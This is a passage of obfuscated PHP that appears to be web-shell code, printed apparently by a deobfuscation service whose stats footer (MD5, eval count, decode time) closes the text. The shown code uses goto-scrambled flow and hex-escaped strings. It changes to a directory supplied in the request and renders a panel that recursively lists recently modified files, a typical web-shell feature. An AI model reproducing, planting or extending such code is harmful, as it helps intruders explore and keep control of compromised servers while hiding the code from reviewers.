(isset($_1337["\x64\x69\x72"])) { $dir = $_1337["\144\x69\162"]; chdir($dir); } else { $dir = $gcw(); } goto hJVd9; nyFwq: function s() { echo "\x3c\x73\164\x79\x6c\x65\76\x74\141\x62\x6c\145\x7b\144\x69\163\x70\x6c\x61\x79\x3a\156\x6f\156\145\73\175\74\57\x73\x74\x79\x6c\145\76\74\x64\151\166\40\143\x6c\x61\163\163\x3d\x22\x74\141\x62\154\x65\55\x72\145\163\x70\x6f\156\163\x69\x76\x65\42\76\74\x63\x65\x6e\164\145\162\76\74\150\162\x3e\x3c\57\150\x72\x3e\x3c\57\x63\145\x6e\x74\145\x72\x3e\74\x2f\144\x69\166\x3e"; } goto c4BSp; huGM_: if ($_1337["\151\x64"] == "\146\151\x6e\x64\x6d\x74\151\x6d\x65") { s(); echo "\74\x64\x69\x76\x20\x63\x6c\141\163\163\x3d\42\x63\157\156\x74\141\151\156\x65\162\x2d\146\x6c\x75\151\x64\42\x3e\12\x3c\x63\x65\156\164\145\162\40\143\154\141\x73\163\75\x22\x61\156\165\42\x3e\x46\151\156\144\40\115\157\x64\151\x66\151\x65\144\x20\106\x69\154\x65\x73\x3c\57\143\x65\x6e\x74\x65\162\x3e\12\x3c\x64\x69\x76\x20\143\x6c\x61\x73\163\x3d\42\x63\141\x72\144\40\143\141\x72\144\55\142\x6f\144\171\40\x74\x65\170\x74\x2d\144\141\162\153\x20\x69\x6e\160\x75\x74\55\x67\x72\157\x75\x70\40\x6d\x62\x2d\x33\42\x3e\xa\40\x20\x20\x20\x3c\144\x69\x76\x20\x63\154\141\x73\163\75\x22\x63\x6f\x6e\x74\x61\x69\x6e\x65\162\x2d\x66\154\165\x69\144\x20\155\x74\x2d\x31\x22\x3e\12\x20\40\x20\40\x20\x20\40\x20\x3c\x66\x6f\162\x6d\x20\x6d\x65\x74\150\157\x64\x3d\42\x50\x4f\x53\x54\42\76\12\x20\x20\40\40\x20\40\x20\40\40\x20\x20\x20\x3c\x64\x69\166\x20\x63\154\x61\x73\x73\75\x22\x66\157\x72\x6d\x2d\147\x72\157\165\x70\42\76\xa\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\x20\40\40\x20\74\151\x20\x63\154\x61\x73\x73\75\42\x62\x69\40\x62\x69\x2d\146\157\154\x64\x65\162\42\76\74\x2f\x69\x3e\x3c\154\141\x62\145\154\40\x66\x6f\x72\x3d\x22\x63\x75\163\x74\157\x6d\x5f\160\141\x74\150\x22\76\46\156\x62\163\x70\73\104\x69\162\145\x63\x74\x6f\162\171\72\x3c\x2f\x6c\x61\x62\145\x6c\76\12\40\40\40\x20\40\x20\40\40\x20\40\x20\x20\40\x20\40\40\x3c\x69\156\160\165\x74\x20\164\x79\x70\x65\x3d\42\164\145\170\164\42\40\x63\x6c\141\x73\x73\x3d\42\146\x6f\162\x6d\55\x63\157\156\164\x72\x6f\154\40\x66\x6f\162\x6d\55\143\x6f\156\164\162\x6f\154\x2d\x73\155\x20\164\x65\x78\x74\55\144\x61\x72\x6b\x20\146\154\145\170\x2d\x67\x72\x6f\167\x2d\x31\x22\x20\x6e\x61\155\x65\x3d\42\143\165\163\164\157\155\137\160\141\x74\150\x22\40\x69\x64\x3d\42\143\x75\163\x74\x6f\155\137\x70\x61\164\150\x22\x20\x76\141\x6c\165\145\75\42" . $dir . "\x22\40\x72\x65\161\x75\151\162\x65\x64\x3e\xa\x20\x20\x20\40\40\40\x20\x20\x20\40\40\40\x3c\x2f\144\x69\x76\x3e\12\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\74\x64\x69\166\x20\x63\154\x61\163\x73\x3d\x22\151\x6e\160\165\164\x2d\147\162\x6f\x75\160\x22\76\xa\40\40\x20\40\40\x20\40\40\40\x20\40\x20\x20\x20\40\x20\x3c\151\x20\143\154\x61\x73\163\75\x22\142\151\40\x62\x69\55\143\x61\x6c\145\156\x64\141\x72\x2d\144\141\164\145\x22\x3e\74\57\151\76\x20\x3c\x6c\141\142\145\x6c\x20\x66\x6f\162\75\x22\164\151\x6d\x65\x5f\162\141\156\147\145\42\x3e\x26\156\142\x73\160\x3b\x4d\x6f\x64\x69\146\151\145\x64\40\104\x61\x74\145\72\46\x6e\142\163\x70\73\46\156\x62\163\x70\x3b\74\x2f\x6c\141\x62\145\154\76\12\x20\40\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\40\x20\x3c\144\x69\166\x20\143\x6c\141\163\x73\75\x22\146\157\162\x6d\x2d\x63\x68\x65\x63\x6b\x22\76\xa\x20\40\40\40\40\x20\40\x20\x20\40\40\40\40\x20\40\40\x20\x20\40\40\74\x69\156\x70\x75\164\40\x63\x6c\141\x73\x73\75\x22\x66\x6f\x72\x6d\x2d\x63\150\x65\143\x6b\55\151\x6e\x70\165\x74\42\40\x74\171\x70\x65\x3d\x22\162\141\x64\x69\157\x22\40\x6e\x61\155\145\x3d\x22\x74\x69\155\145\137\162\141\156\147\x65\x22\x20\x69\144\75\42\61\x6d\x69\156\x22\x20\166\141\154\x75\145\75\42\x31\x6d\x69\x6e\x22\x20\143\150\x65\143\x6b\145\x64\76\12\40\x20\40\40\40\40\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\x3c\x6c\141\x62\x65\x6c\40\x63\x6c\141\163\163\75\42\x66\x6f\162\x6d\x2d\x63\x68\x65\143\x6b\x2d\x6c\x61\142\145\x6c\x22\x20\146\x6f\x72\x3d\42\61\155\x69\x6e\x22\76\x31\x20\115\151\x6e\x75\164\x65\x26\x6e\142\x73\160\73\46\x6e\x62\163\160\x3b\x3c\x2f\x6c\x61\x62\x65\154\x3e\xa\40\x20\40\40\40\40\x20\40\x20\40\40\40\40\x20\x20\40\74\x2f\x64\x69\166\76\xa\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\40\40\40\x20\x3c\x64\151\166\x20\143\x6c\141\163\163\x3d\42\146\x6f\x72\x6d\x2d\x63\x68\x65\143\153\x22\x3e\12\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\x3c\151\x6e\x70\165\x74\40\x63\154\141\x73\x73\x3d\x22\146\x6f\162\x6d\55\143\150\145\x63\x6b\x2d\x69\x6e\x70\x75\x74\x22\40\x74\171\160\145\75\42\x72\141\x64\151\157\x22\40\156\141\x6d\x65\x3d\42\164\151\x6d\x65\137\x72\141\156\x67\x65\x22\x20\x69\144\x3d\42\61\x64\141\171\x22\40\166\x61\x6c\165\145\x3d\x22\x31\x64\141\x79\x22\x3e\xa\40\40\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\x20\40\x20\40\x20\40\x3c\x6c\x61\x62\145\154\x20\x63\154\141\x73\163\75\x22\x66\x6f\x72\x6d\x2d\143\x68\145\143\153\55\154\141\142\x65\x6c\42\x20\146\157\x72\x3d\x22\x31\x64\141\171\42\x3e\x31\x20\x44\x61\171\46\x6e\142\163\160\73\x26\x6e\x62\x73\x70\73\74\57\154\141\142\145\154\x3e\12\40\40\x20\x20\40\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\x3c\x2f\144\151\166\x3e\xa\x20\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\40\40\x20\x3c\144\151\x76\40\143\x6c\141\x73\163\x3d\x22\x66\157\162\x6d\55\143\x68\145\143\x6b\42\x3e\xa\40\x20\x20\40\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\40\74\151\x6e\160\x75\164\x20\143\154\x61\x73\x73\x3d\x22\146\157\162\x6d\x2d\143\x68\x65\143\153\x2d\x69\156\x70\x75\164\x22\x20\164\171\x70\x65\75\42\162\x61\144\151\x6f\x22\40\x6e\x61\x6d\x65\75\x22\164\151\155\145\137\x72\x61\x6e\x67\145\x22\x20\151\144\75\42\x31\x30\144\141\x79\x73\42\x20\166\x61\x6c\165\x65\x3d\42\61\x30\144\141\x79\163\42\x3e\xa\x20\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\40\x20\40\x20\x20\40\x20\x3c\x6c\141\142\145\x6c\40\x63\154\x61\163\163\x3d\42\x66\157\x72\x6d\55\x63\150\x65\143\153\x2d\154\x61\142\x65\x6c\x22\x20\x66\157\162\x3d\42\x31\x30\x64\141\171\x73\x22\76\x31\60\40\x44\141\x79\x73\46\x6e\x62\163\160\x3b\x26\x6e\x62\x73\x70\73\74\57\154\x61\142\145\x6c\x3e\12\40\x20\40\x20\x20\40\x20\x20\40\40\40\40\x20\40\x20\x20\x3c\57\x64\151\166\x3e\xa\40\40\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\40\40\x3c\144\x69\x76\40\x63\154\x61\x73\x73\75\42\146\x6f\x72\155\55\x63\x68\x65\143\x6b\42\x3e\12\40\x20\40\x20\40\x20\x20\40\x20\40\40\40\40\40\40\x20\x20\40\x20\40\74\151\156\160\x75\164\40\143\154\x61\x73\x73\x3d\42\x66\x6f\x72\155\55\143\x68\x65\x63\153\55\x69\x6e\160\165\164\42\40\164\171\x70\145\75\42\162\x61\144\151\x6f\42\40\156\x61\155\x65\x3d\x22\164\x69\155\145\137\162\141\x6e\x67\145\42\40\151\144\75\42\61\155\x6f\156\164\x68\42\x20\166\x61\x6c\x75\x65\x3d\x22\61\x6d\x6f\x6e\164\150\x22\76\12\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\74\154\x61\x62\145\x6c\x20\x63\x6c\x61\163\163\75\x22\146\157\x72\x6d\55\x63\x68\x65\143\x6b\55\154\141\142\x65\x6c\x22\x20\x66\x6f\x72\x3d\x22\x31\x6d\157\156\164\x68\x22\76\61\x20\x4d\157\156\164\150\x26\156\142\163\160\x3b\x26\156\x62\163\160\x3b\74\x2f\154\x61\x62\145\154\76\xa\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\40\40\x20\74\57\144\151\x76\76\xa\40\x20\40\40\40\40\40\40\x20\x20\40\x20\x3c\57\144\x69\166\x3e\12\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\x3c\144\x69\x76\x20\x63\154\x61\x73\163\75\42\x64\55\147\162\151\144\40\147\x61\x70\x2d\62\42\76\12\40\40\40\x20\x20\x20\40\40\40\40\x20\40\40\x20\x20\x20\x3c\151\156\x70\165\x74\x20\x63\x6c\x61\x73\x73\x3d\42\x62\164\x6e\40\142\164\x6e\x2d\144\141\x72\153\x20\142\164\156\55\x73\x6d\x22\x20\164\x79\x70\145\x3d\x22\x73\x75\x62\x6d\x69\164\x22\x20\156\x61\x6d\145\75\42\163\143\x61\156\42\40\x76\141\154\165\145\75\42\123\165\142\155\x69\x74\41\42\76\xa\40\40\40\x20\40\40\x20\x20\40\40\x20\x20\74\x2f\144\x69\166\x3e\12\40\40\40\x20\x20\40\40\x20\x3c\57\x66\157\x72\155\76\xa\x20\40\40\40\x3c\x2f\144\151\166\76\12\x3c\57\x64\151\166\76\12\74\x2f\144\x69\166\x3e"; function getModifiedFiles($path, $startTime, $endTime) { $files = array(); $dirContent = scandir($path); foreach ($dirContent as $item) { if ($item != "\x2e" && $item != "\x2e\x2e") { $itemPath = $path . "\57" . $item; if (is_dir($itemPath)) { $subDirFiles = getModifiedFiles($itemPath, $startTime, $endTime); $files = array_merge($files, $subDirFiles); } else { $modifiedTime = filemtime($itemPath); if ($modifiedTime >= $startTime && $modifiedTime <= $endTime) { $files[] = $itemPath; } } } } return $files; } $customPath = isset($_POST["\x63\x75\163\x74\x6f\155\x5f\x70\x61\x74\x68"]) ? $_POST["\143\x75\x73\164\157\x6d\x5f\160\141\x74\150"] : getcwd(); if (isset($_POST["\163\x63\141\156"])) { $currentDateTime = new DateTime(); $startTime = $currentDateTime->getTimestamp(); $selectedRange = $_POST["\164\151\x6d\145\137\162\141\156\x67\145"]; switch ($selectedRange) { case "\61\x6d\x69\156": $endTime = $startTime - 60; break; case "\x31\x64\141\x79": $endTime = $startTime - 60 * 60 * 24; break; case "\61\x30\144\141\171\x73": $endTime = $startTime - 60 * 60 * 24 * 10; break; case "\61\155\157\156\164\150": $endTime = $startTime - 60 * 60 * 24 * 30; break; default: $endTime = $startTime; } $modifiedFiles = getModifiedFiles($customPath, $endTime, $startTime); echo "\x3c\144\x69\x76\x20\x63\x6c\141\163\163\75\42\x63\x61\x72\144\x20\x63\141\162\144\55\x62\x6f\x64\x79\x20\164\145\170\x74\x2d\x64\141\162\x6b\x22\76\x3c\x75\154\x3e"; foreach ($modifiedFiles as $file) { echo "\x3c\154\151\76{$file}\x20\x3c\147\x72\x3e\40\x2d\x3e\x20\x46\151\x6c\145\40\155\x6f\x64\151\146\151\x65\x64\40\x61\164\x20{$currentDateTime->format("\131\x2d\x6d\55\144\40\110\72\x69\x3a\x73")}\x3c\57\147\x72\76\x3c\x2f\154\151\x3e"; } echo "\x3c\x2f\165\x6c\76\x3c\57\x64\x69\x76\x3e"; } } goto CIER1; QJtcJ: ?>
Function Calls
None |
Stats
MD5 | 4e684cfe3f66d7b1f700a4f194c7d9f9 |
Eval Count | 0 |
Decode Time | 213 ms |